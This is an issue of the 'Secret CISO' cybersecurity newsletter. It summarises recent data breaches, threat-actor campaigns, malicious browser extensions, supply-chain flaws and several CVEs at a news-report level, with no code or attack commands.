Welcome to today's edition of Secret CISO, where we unravel the latest in cybersecurity breaches and vulnerabilities, weaving a narrative of caution and vigilance. As we navigate through the digital landscape, today's stories highlight the persistent threats and the urgent need for robust security measures.

First, we delve into the Panera Bread breach, where 14 million customers' data fell into the hands of the notorious ShinyHunters group. This incident raises alarms about data protection practices, echoing similar concerns in South Korea, where Coupang's interim CEO faces scrutiny over a significant data breach.

In the financial sector, CFD Investments and the Center for Life Resources are under legal investigation following breaches that exposed sensitive information, potentially leading to class action lawsuits. Meanwhile, The Phia Group's breach underscores the critical need for safeguarding health information.

On the cyber warfare front, the China-linked UAT-8099 group is targeting IIS servers in Asia with BadIIS malware, while a cybercrime group claims credit for a series of voice phishing attacks, highlighting the evolving nature of cyber threats.

Security researchers have also uncovered malicious Chrome extensions exploiting affiliate links and stealing ChatGPT access, emphasizing the importance of scrutinizing browser extensions. Additionally, the rise of 'Shadow AI' poses new risks as employees increasingly use unauthorized AI tools.

In the realm of software vulnerabilities, the 'PackageGate' flaws threaten software supply chains, while several CVEs reveal critical weaknesses in widely used systems, urging immediate action to patch and secure affected applications.

Stay informed and vigilant as we continue to explore these unfolding stories, reminding us of the ever-present need for cybersecurity resilience.

Data Breaches

1. Panera Bread Breach: ShinyHunters Claims Hack of 14 Million Customers' Data
2. Panera Bread and its customers are the latest victims of a data breach reportedly carried out by the ShinyHunters hacking group. The breach exposed sensitive information of 14 million customers, raising concerns over the company's data security practices. Panera is currently investigating the incident and working to enhance its security measures. Source:
3. Mashable
4. .
5. South Korean Police to Question Interim CEO of Coupang in Data Breach Probe
6. South Korean police are set to question the interim CEO of Coupang over a significant data breach that exposed sensitive customer information. The breach has sparked a major investigation, with authorities seeking to understand the extent of the damage and the company's response. Coupang has pledged full cooperation with the investigation. Source:
7. Reuters
8. .
9. CFD Investments Data Breach Investigation
10. Strauss Borrelli PLLC is investigating a recent data breach at CFD Investments, Inc. The breach has raised alarms about the security of financial data and the potential impact on clients. The law firm is exploring the possibility of a class action lawsuit to address the breach's consequences. Source:
11. Strauss Borrelli PLLC
12. .
13. Center for Life Resources Data Breach Reported; Attorneys Investigating
14. The Center for Life Resources has reported a data breach, prompting legal investigations into the incident. The breach has potentially exposed sensitive personal information, leading to discussions about a possible class action lawsuit. Affected individuals are advised to monitor their personal data closely. Source:
15. Class Action
16. .
17. The Phia Group Data Breach Affects SSNs, Health Info
18. The Phia Group has experienced a data breach affecting Social Security numbers and health information. This breach has prompted legal scrutiny and potential class action lawsuits. The incident highlights the critical need for robust data protection measures in handling sensitive health information. Source:
19. Class Action
20. .

Security Research

1. China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware: Security researchers have identified a new campaign by the China-linked group UAT-8099, which is targeting IIS servers in Asia using a malware dubbed BadIIS. This malware is designed to manipulate search engine optimization (SEO) to redirect traffic and potentially exploit vulnerabilities in the servers. The discovery highlights the ongoing threat posed by state-sponsored cyber activities in the region. Source: The Hacker News.
2. Cybercrime Group Claims Credit for Voice Phishing Attacks: A cybercrime group has taken responsibility for a series of voice phishing attacks, as reported by security researchers at Okta. These attacks involve social engineering tactics to trick victims into revealing sensitive information over the phone. The incident underscores the evolving nature of phishing attacks and the need for heightened awareness and security measures. Source: TechCentral.ie.
3. Researchers Uncover Chrome Extensions Abusing Affiliate Links and Stealing ChatGPT Access: Security experts have discovered malicious Chrome extensions that are exploiting affiliate links and stealing ChatGPT authentication tokens. These extensions pose a significant threat by exfiltrating user data and potentially compromising user accounts. The findings emphasize the importance of scrutinizing browser extensions for security vulnerabilities. Source: The Hacker News.
4. Is 'Shadow AI' a Threat to Your Business? Report Claims Workers Are Increasingly More Willing to Cut Corners: A report highlights the growing risk of 'Shadow AI,' where employees use unauthorized AI tools and services, potentially exposing businesses to security vulnerabilities. The report suggests that IT teams need to reinforce policies and educate employees on the risks associated with unapproved AI usage. Source: TechRadar.
5. 'PackageGate' Vulnerabilities Can Let Attackers Bypass Shai-Hulud Defenses: Koi Security researchers have identified six vulnerabilities, collectively known as 'PackageGate,' that could allow attackers to bypass defenses in npm and other package managers. These flaws could enable the spread of malicious code through package repositories, posing a significant risk to software supply chains. Source: DevOps.com.

Top CVEs

1. CVE-2025-24293: Active Storage allowed transformation methods potentially unsafe. This vulnerability impacts applications using Active Storage with the imageprocessing gem and minimagick, allowing potential command injection vulnerabilities through untrusted arbitrary input. Users should upgrade or apply strict validation and security policies immediately. Source: Vulners.
2. CVE-2025-62348: Salt's junos execution module contained an unsafe YAML decode/load usage. A specially crafted YAML payload could lead to unintended code execution under the Salt process context. Users should ensure their systems are patched to prevent exploitation. Source: Vulners.
3. CVE-2025-62349: Salt contains an authentication protocol version downgrade weakness. This allows a malicious minion to bypass newer security features by using an older request payload format, enabling minion impersonation. Users should upgrade to versions that address this vulnerability. Source: Vulners.
4. CVE-2025-26385: Johnson Controls Metasys component has a command injection vulnerability. Successful exploitation could allow remote SQL execution, affecting various Metasys installations with SQL Express. Users should update to secure versions to mitigate this risk. Source: Vulners.
5. CVE-2025-11175: Expression Language Injection vulnerability in Wikimedia Foundation Mediawiki - DiscussionTools Extension. This vulnerability allows Regular Expression Exponential Blowup, affecting specific versions of the extension. Users should upgrade to patched versions to avoid potential exploitation. Source: Vulners.

Final Words

As we wrap up today's edition of Secret CISO, it's clear that the digital landscape is as dynamic as ever, with new threats and vulnerabilities emerging at every turn. From the Panera Bread breach affecting millions to the sophisticated tactics of cybercrime groups, the need for robust security measures and vigilant awareness has never been more critical.

We also explored the ongoing investigations into major data breaches, the rise of 'Shadow AI,' and the discovery of vulnerabilities like 'PackageGate' that threaten software supply chains. Each story serves as a reminder of the importance of staying informed and proactive in our cybersecurity efforts.

We hope you found today's insights valuable and encourage you to share this newsletter with friends and colleagues who might benefit from staying updated on the latest in cybersecurity. Together, we can build a more secure digital world.

Until next time, stay safe and vigilant!